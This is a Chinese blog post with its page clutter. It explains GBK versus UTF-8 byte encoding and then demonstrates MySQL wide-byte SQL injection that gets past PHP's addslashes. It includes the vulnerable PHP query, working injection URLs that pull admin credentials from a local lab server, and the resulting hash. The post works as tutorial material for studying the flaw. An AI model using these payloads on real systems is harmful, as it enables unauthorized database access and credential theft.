MySQL 宽字节注入——关于GBK编码和UTF-8编码

最新推荐文章于 2021-03-17 03:20:49 发布
最新推荐文章于 2021-03-17 03:20:49 发布
阅读量4.9k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 编码 utf-8 ascii
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/68952300
版权

参考:
http://blog.csdn.net/jnbbwyth/article/details/6991425
https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html

关于GBK编码和UTF-8编码

这个文件原文只有ASCII字符,当我加上两个汉字之后就不得不变成了UTF-8字符。
这里写图片描述

iconv这个工具(MacOS, ubuntu和kali好像是自带的)可以用来转换编码。
比如,将一个文件从utf-8编码格式转换成gbk编码格式。注意要写明输出的文件名(-o),不然会输出到标准输出。

iconv -f utf-8 -t gbk coding_test.php -o coding_test.php

这里写图片描述
利用xxd这个工具可以发现,在utf-8编码方式下,通过e5928c这个三个字节来表示一个汉字”和”;而在gbk编码方式下,通过bacd这两个字节来表示一个汉字”和”。由于汉字无法通过ASCII编码显示出来,于是xxd右边用...来表示几个字节。

MySQL 宽字节注入

加单引号不报错,说明不存在注入
这里写图片描述
这里写图片描述
在这个sql语句前面,我们使用了一个addslashes函数,将$id的值转义。这是通常cms中对sql注入进行的操作,只要我们的输入参数在单引号中,就逃逸不出单引号的限制,无法注入。

$id = isset($_GET['id']) ? addslashes($_GET['id']) : 1;
$sql = "SELECT * FROM news WHERE tid='{$id}'";

那么怎么逃过addslashes的限制?众所周知addslashes函数产生的效果就是,让'变成\',让引号变得不再是“单引号”,只是一撇而已。一般绕过方式就是,想办法处理\'前面的\

  1. 想办法给\前面再加一个\(或单数个即可),变成\\’,这样\被转义了,于是'逃出了限制。
  2. 想办法把\弄没有

于是构造一个EXP。
http://192.168.10.163/data_and_sql/0x01/index.php?id=-1%a1%27UNION+Select+1,2,concat(name,0x23,pass)+FROM+admin#
这里写图片描述
这样还是不行。注意要把末尾的#urlencode一下。
http://192.168.10.163/data_and_sql/0x01/index.php?id=-1%df%27%20union%20select%201,2,concat(name,0x23,pass)%20from%20admin%23
这里写图片描述

MariaDB [test]> select concat(name,0x23,pass) from admin;
+----------------------------------------+
| concat(name,0x23,pass)                 |
+----------------------------------------+
| admin#21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------------+
1 row in set (0.00 sec)

其中0x23代表#concat(param1,param2,param3)表示将这三个参数连接起来。

关于

mysql_set_charset("utf8",$link);
mysql_query("SET NAMES 'UTF8'");

这两行的区别。
mysql_set_charset("utf8",$link);其实做了mysql_query("SET NAMES 'UTF8'");它做的事。而且后者并不被PHP官方建议。PHP官方建议使用前者,也就是mysql_set_charset("utf8",$link);
PHP PDO: charset, set names?
“set names” vs mysqli_set_charset — besides affecting mysqli_escape_string, are they identical?

caiqiiqi
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
MySQL GBKUTF-8编码转换
12-17
前言: 第一次写教程,其实算不得教程,只是想总结个转换的手记。如果中间有错误,或者办法不够理想,大家回贴研究下。 另外,我也希望我们论坛不仅仅作为闲聊的地方,也希望大家能活跃我们论坛的学习气氛,毕竟我们都来自一个应该给我们知识的地方,不论你从那里获得了多少你需要的知识。 好了,言归正传。 一准备: 环境:MySQL4.1.x及以上版本。 Convertz——文本编码转换工具,molyx上介绍的,我采用的。其实这类工具很多。 二理论: MySQL从4.1版本开始内部存储字符集支持了UTF-8,这个我也是这几天才看到的。因为升级论坛过程中,服务器数据库环境为4.0.26当时不知道并不支持utf-8
mysql数据库设置utf-8编码的方法步骤
01-19
修改/etc/my.cnf或者/etc/mysql/my.cnf文件 [client] default-character-set = utf8 [mysqld] default-storage-engine = INNODB character-set-server = utf8 collation-server = utf8_general_ci 重启mysql,使用mysql客户端检查编码 show variables like '%char%'; 创建新数据库时使用UTF-8编码 create database 'test' default character set u
多字节与UTF-8、Unicode之间的转换
10-26
多字节与UTF-8、Unicode之间的转换 ,里面有相互转换的6个函数 ,稍微修改下可以加到自己的c++程序中,比较好用
mysql默认编码UTF-8 通过修改my.ini实现方法
01-19
mysql汉字乱码的原因 mysql默认的编码是Latin1是I-8859-1的别名,但Latin1是不支持汉字的,所以要将其改为UTF-8GBK 1.关闭mysql服务器,这个很重要。 2.通过my.ini设置mysql数据库的编码mysql数据库的安装根目录下找到my.ini,例:C:\Program Files\MySQL\MySQL Server 5.5 将其复制到桌面,双击打开, 搜索“default-character-set”将其改为utf8, 搜索“character-set-server=utf8”将其改为utf8 看下图,修改成功保存,将my.ini复制回C:\Pr
utf-8uft8
weixin_30670925的博客
04-24 126
设置mysql连接用的字符编码,要用uft8,而不是uft-8 mysqli_query($conn,"set names utf8"); 转载于:https://www.cnblogs.com/souroot/p/4453554.html
blob字段怎么查看是乱码_MySQL乱码的原因和设置UTF8数据格式
weixin_30768925的博客
12-27 893
MySQL使用时,有一件很痛苦的事情肯定是结果乱码。将编码格式都设置为UTF8可以解决这个问题,我们今天来说下为什么要这么设置,以及怎么设置。MySQL字符格式字符集在编程语言中,我们为了防止中文乱码,会使用unicode对中文字符做处理,而为了降低网络带宽和节省存储空间,我们使用UTF8进行编码。对这两者有什么不同不够了解的同学,可以参考Unicode字符集和UTF8编码编码的前世今生这篇文章。...
宽字节注入
rane的博客
03-18 280
宽字节注入原理 宽字节注入方法 以第32关为例,输入单引号后会经过check_addslashes函数替换 数据库连接的时候使用的是gbk编码 http://127.0.0.1/Less-32/?id=1%df’ order by 3–+ 三列 http://127.0.0.1/Less-32/?id=-1%df’ union select 1,2,version()–+ 使用union查询需...
mysql gbk utf8_MySQL utf8存储 GBK读取,该如何解决
weixin_42298105的博客
02-17 359
mysql utf8存储 GBK读取我的MySQL数据库用的是清一色的utf8,见表语句如下,存储引擎MyISAM,但是我把该表的三个相关文件拷贝给一个朋友,他的数据库安装时选得时GBK(没改过)。在他那里中文可以正常显示,按照我的想法是,我的数据表用的是utf8,他用GBK读出来应该是乱码。为什么没有乱码。而且在他那里查看该表的信息依然是utf8的。求解释。mysql> show cre...
汉字编码方案
weixin_45406155的博客
09-19 4455
由于计算机只能处理数字,因此,当需要用计算机来处理字符(以及字符串)的时候,就要有一种机制来实现字符到数字的转换,这便是字符串的编码。 最开始的时候,计算机只有英文字符,故需要编码的符号比较少。此时用的编码ASCII编码,其中包括大小写英文字母、数字以及一些符号 此时实现这些字符的编码,只需要一个字节就够了(即8位)。但是对于中文来说,需要对汉字进行编码时,一个字节是远远不够的。考虑到不能和当时已有的ASCII编码冲突,中文最初制定了GB2312编码。其中包括6763个汉字和682个其它符号。95年重新修
mysql gbk编码 字节数_MySql中UTF8 和 GBK 编码中文字符长度问题
weixin_31841431的博客
01-27 325
为什么要了解MySql中UTF8 和 GBK 编码中文字符长度呢?举个例子,在oracle中用utf8 字段中文长度为1的话,需要char(3),mysql中则是char(1),如果你按照oracle的做法去创建mysql字段,是不是在mysql表中创建的长度大小与自己锁想的不一样呢,所以这个小知识点还是有必要了解的。我在经过实验后得到以下结论(适用MySQL 5.0以上版本):1.一个汉字占多少...
mysqlli php7.0_php 7连接mysql数据库
weixin_34005090的博客
12-30 339
PHP 5 的使用者可以使用 mysql extension,mysqli 和 PDO_MYSQL 。PHP 7移除了mysql extension,只剩下后面两种选择.这份文档解释了每个API 的术语,帮助我们如何使用API 和了解相关API的信息。PHP 提供了三种不同的API去连接mysql数据库。下面的示例代码展示了3种不同连接mysql数据库的方式。/** mysqli* 数据库地址,登...
mysqlmysqli 必须转换的转换
kulerop的专栏
07-21 723
define('DB_HOST','localhost'); define('DB_USER','root'); define('DB_NAME','xinxi'); define('DB_PWD','root'); // //连接数据库 // $lianjie=mysql_connect(DB_HOST,DB_USER,DB_PWD) or die('数据库连接错误信息'.mysql_erro...
Mysql第二篇:windows环境下Mysql安装(zip压缩包安装)
专注分享个人所得,希望给大家带来帮助
05-22 462
不得不吐槽一下,msi安装包不可以修改安装位置,着实很坑。如果哪位大佬知道msi安装方式可以修改,请给我留言,非常感谢。 zip安装包下载地址:https://dev.mysql.com/downloads/mysql/ 安装教程:https://www.jianshu.com/p/647a596cb251 上面那个教程亲测可用。 注意事项,虽然现在8.0版本的mysql推荐使用字符编码是utf8...
MySQLGBKUTF-8的区别
Mars Suburbs People
02-11 324
MySQL中,如果数据库只需要支持一般中文,数据量很大,性能要求也比较高,那么就最好选择GBK,因为相对于UTF-8而言,GBK占用的空间较 小,每个汉字只占2个字节,而UTF-8汉字编码需要3个字节,这样可以减少磁盘I/O、数据库cache,以及网络传输的时间,从而提高性能,相反,如 果数据库主要处理英文,则建议采用UTF-8,因为GBK对英文字符编码也采用2个字节,而UTF-8只需要一个字...
MySQL中utf8mb4与utf8的区别
海阳之新's blog
10-01 678
utf8mb4的来历 MySQL在5.5.3之后增加了这个utf8mb4的编码,mb4就是most bytes 4的意思,专门用来兼容四字节的unicode。(gbk是双字节的,utf8是三字节的,utf8mb4是四字节的) 举个栗子: 最常见的就是Emoji 表情(Emoji 是一种特殊的 Unicode 编码,常见于 ios 和 android 手机上),和一些不常用的汉字,以及任何新增的 U...
MySQL字符集UTF8与GBK之间如何选择
jfeng1141的博客
05-30 6880
字符集是一套文字符号、编码、比较规则的集合。对数据库来说,字符集更加重要,因为数据库存储的数据几乎都是各种文字,字符集对数据库的存储、处理性能,以及日后系统的移植都有影响。 MySQL中支持几十种字符集,在这些字符集之间我们应该如何选择合适的字符集呢?做为国内用户来讲,基本都在UTF8与GBK之间徘徊。 UTF8 UTF8是Unicode字符集,是UTF16改良版本,1至4字节编
mysql gbk编码 字节数,mysqlutf-8编码数据库转换成GBK编码的问题
weixin_39649611的博客
03-17 448
摘要 腾兴网为您分享:mysqlutf-8编码数据库转换成GBK编码的问题,之了课堂,易信,一折包邮,星球联盟等软件知识,以及七日杀,草莓软件,装修施工站,桔子会,桌面切换,看小说神器,酷派应用商店,filerecovery,时间表软件,小马金融,四川高考一分一段表,武汉市环境保护局,红木家具购销合同,人物透视,深圳住房公积金管理中心等软件it资讯,欢迎关注腾兴网。有时需要将utf-8编码的数据...
mysql+gbk存储_Mysql以utf8存储gbk输出的实现方法提供
weixin_42405371的博客
02-02 193
一个站有可能经历gb2312(gbk,big5)到utf8的转换过程,其中会遇到很多的问题。站点太庞大了怎么办呢,只能一步步来了。要是能在极少改动前端代码的情况下,先完成数据的转换将会使整件事情容易得多。经过几天测试终于发现,Mysql以utf8存储gbk输出是可以实现的。mysql4.1后都有个特性,可以指定当前客户端连接所使用的字符集,mysql默认都是latin1,或由mysqlserve...
MYSQL之UTF8sql文件导入GBK编码的数据库最简单办法
weixin_39600768的博客
02-18 3418
最近要将一个300M的UTF-8的.sql文件导入编码格式为GBKMYSQL数据库,以前有个办法就是复制UTF8编码内容到WINDOWS自带的记事本中,然后另存为ANSI编码即可; 现在的问题的是,记事本打不开这个300M的文件,至少我是没有耐心等到它打开了,那这个办法也没有用了,网上找了找,也没有发现有用的办法,得了,自己想吧。 因为我使用的PHP语言,正好就想起PHP有个ico...
mysql修改表的编码utf-8
最新发布
08-31
MySQL修改表的编码集为UTF-8可以通过ALTER TABLE语句来完成。首先,我们需要打开MySQL的终端或者客户端工具,以便执行SQL命令。 首先,使用SHOW DATABASES命令查看当前MySQL服务器上的所有数据库。选择要修改表编码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值